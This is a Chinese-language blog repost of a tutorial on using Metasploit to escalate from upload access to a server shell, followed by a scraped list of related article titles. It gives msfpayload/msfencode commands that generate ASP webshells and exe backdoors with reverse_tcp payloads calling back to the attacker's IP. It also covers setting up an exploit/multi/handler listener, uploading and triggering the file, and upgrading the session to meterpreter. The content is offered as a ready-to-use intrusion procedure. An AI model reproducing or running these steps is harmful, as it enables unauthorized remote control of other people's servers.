为什么80%的码农都做不了架构师?>>>   

首先建议一下到网上查查meterpreter的用法在看这篇文章,理解为什么要使用msf来提权(因为msf里边有个meterpreter很强大 ^_^)
Metasploit 拥有msfpayload 和msfencode 这两个工具,这两个工具不但可以生成exe 型后门,一可以生成网页脚本类型的webshell ,通过生成webshell 然后设置监听器,访问webshell的url,幸运的话可以产生一个session,以便进一步利用。
下面是具体的利用方法。
我们可以通过指令查看msf里的payload 然后记住其位置:使用如下的指令来产生一个webshell,和前边将的msfpayload的用法类似,只不过这里生成的是一个网页脚本文件:
产生webshell
msfpayload windows/meterpreter/reverse_tcp LHOST=your_ip | msfencode -t asp -o webshell.asp
然后将此webshell上传到服务器(这个步骤要有上传权限。)
然后启动msfconsole
输入use exploits/multi/handler,
set PAYLOAD windows/meterpreter/reverse_tcp(这里的payload要和前边的msfpayload所使用的一样。
set LHOST your_ip,
执行exploit,
然 后访问webshell的url,这里使用curl 访问curl http://host/webshell.asp ,如果exploit执行成功的话就可以看到msfconsole中有返回meterpreter shell,如果meterpreter不会用网上查一下,很多。
但是我使用netbox 搭建asp环境老是执行出错,希望读者在实际验证不出错后再使用。
这里产生的是asp的webshell 也可以产生php webshell,jsp webshell 需要在msfencode时用-t 参数指定脚本类型,我认为php类型的webshell更容易成功。

另外如果获取服务器拥有可以上传并且执行上传文件的权限的话,可以上传一个msfpayload产生的后门,设置监听,然后执行后门,返回一个 session然后将session转为meterpreter,这样就可以方便的使用meter各种特性了。给个步骤:(前提在上边以及说明了)
1、msfpayload windows/shell_reverse_tcp LHOST=your_ip R | msfencode -t exe -o test.exe
2、打开msfconsole (另外开一个terminate终端)
3、设置监听(监听这个词好像很高级,别被它吓到):use exploits/multi/handler,set LHOST=your_ip,执行exploit
4、将test.exe 上传到服务器
5、在服务器上执行test.exe 就可以返回一个shell了。
6、将windows shell 转成 meterpreter shell:由于使用的payload是shell_reverse_tcp,看名字就知道了返回一个shell,可以在监听器看到返回了一个 windows shell(windows 命令提示符),而不是一个meterpreter shell,这样就要转换了,方法是 按下Ctrl + z 使 windows shell 后台运行,然后sessions 指令查看 shell 的session是多少
,然后执行 sessions -u number(number为你找到的windows shell session号。这样就产生了一个meterpreter shell,可以利用meterpreter强大的功能。也有可能出错,仔细看出错信息然后复制其一部分google一下。
可能读者些疑问:既然可以在上传执行exe文件,为什么要用msf呢,直接上传一个强大木马不是更方便么。我想说因为msf 中有个强大的Meterpreter。
总结,可以发挥想象,挨个试试payloads有的payloads 不能用,也许有意外的发现。

[via@91ri]

转载于:https://my.oschina.net/mik3y/blog/291575

msf 之 webshell 提权相关推荐

  1. 常用webshell提权方法

    pcAnywhere提权: 1.利用pcAnywhere提权,前提条件是pcAnywhere默认安装到默认路径,以及它的目录安全权限有users权限,如果管理员删除了users和power users ...

  2. 一套webshell提权教程

    前言:webshell提权一直就是脚本方面最受欢迎的一个问题,当然也是最困难的一个问题,所以我根据自己平时提权的一些方法和网络收集的文 章总成了这一套webshell提权教程,希望大家能够学习到东西, ...

  3. webshell提权教程小结

    前言:webshell提权一直就是脚本方面最受欢迎的一个问题,当然也是最困难的一个问题,所以我根据自己平时提权的一些方法和网络收集的文 章总成了这一套webshell提权教程,希望大家能够学习到东西, ...

  4. MSF/CS框架提权姿势

    MSF/CS框架提权姿势/不是万能的,很多情况下可能并不能提权成功,我们要多尝试! Meterpreter自动提权 Meterpreter自动提权命令 bypassUAC 进程注入 内存注入 Even ...

  5. 虚拟主机封杀WebShell提权!

    虚拟主机封杀WebShell提权! (2006-10-17 15:24:45) http://blog.sina.com.cn/s/blog_4560b80b010007py.html 转载▼   分 ...

  6. Metasploit 之 webshell 提权

        本文所涉及的方法只能在已授权的机器上做测试.     首先建议一下到网上查查meterpreter的用法在看这篇文章,理解为什么要使用msf来提权(因为msf里边有个meterpreter很强 ...

  7. 常用webshell提权方法总结

    pcAnywhere提权: 1.利用pcAnywhere提权,前提条件是pcAnywhere默认安装到默认路径,以及它的目录安全权限有users权限,如果管理员删除了users和power users ...

  8. webshell提权宝典

    网络安全  说到花了九牛二虎的力气获得了一个webshell, 当然还想继续获得整个服务器的admin权限,正如不想得到admin的不是好黑客- 嘻嘻--好跟我来,看看有什么可以利用的来提升权限 ** ...

  9. 经典的webshell提权

    说到花了九牛二虎的力气获得了一个webshell,  当然还想继续获得整个服务器的admin权限,正如不想得到admin的不是好黑客-  嘻嘻--好跟我来,看看有什么可以利用的来提升权限  ***** ...

最新文章

  1. 服务器操作系统的安全策略,服务器操作系统的安全策略
  2. sourceinsight如何显示完整文件路径
  3. 阿里巴巴在 Serverless 计算领域的探索
  4. java调用go接口_go语言调用API实线分词
  5. 自动化测试框架 2019_2019年用于自动化的5个最佳Java测试框架
  6. 用html5交换两个变量的值,Python判断两个对象相等的原理 python交换两个变量的值为什么不用中间变量...
  7. (kruskal)Jungle Roads
  8. javascript 事件 第23节
  9. MATLAB中unwrap函数
  10. 计算机科学专业必读的44册经典著作
  11. 拦截器手动添加spring注入方法
  12. 解决word错误提示宏错误提示和模板错误提示
  13. 自己碰到的一个“无法读取源文件或磁盘”问题处理
  14. Linux开发板循环显示红绿蓝
  15. 时间复杂度o(1), o(n), o(logn), o(nlogn)
  16. 外星人电脑装linux双系统,在外星人电脑上安装windows10和ubuntu16.04双系统小记
  17. C语言limits.h和float.h头文件
  18. android keystore 查看、修改密码和别名等
  19. 微信开发者工具修改内存限制、皮肤等
  20. 什么是虚拟主播?虚拟数字人直播,不用出镜,不用露脸的直播方式

热门文章

  1. 远程扫描iPhone相册?苹果的好心网友不领情
  2. 字节跳动获CVPR2021 细粒度图像竞赛双料冠军
  3. 公司GitHub被封号,只因员工在伊朗开电脑,官方:将撤销被美制裁国家限制
  4. 「微服务系列 13」熔断限流隔离降级
  5. thinkphp中出现unserialize(): Error at offset 533 of 1857 bytes如何解决
  6. javaScript入门之常用事件
  7. svn无法创建分支的解决方法
  8. 为何大多数人做出来的图表只是一坨屎?
  9. Java代理系列-动态代理
  10. 使用repeater,遍历数据,不规则排序,不同的样式之间切换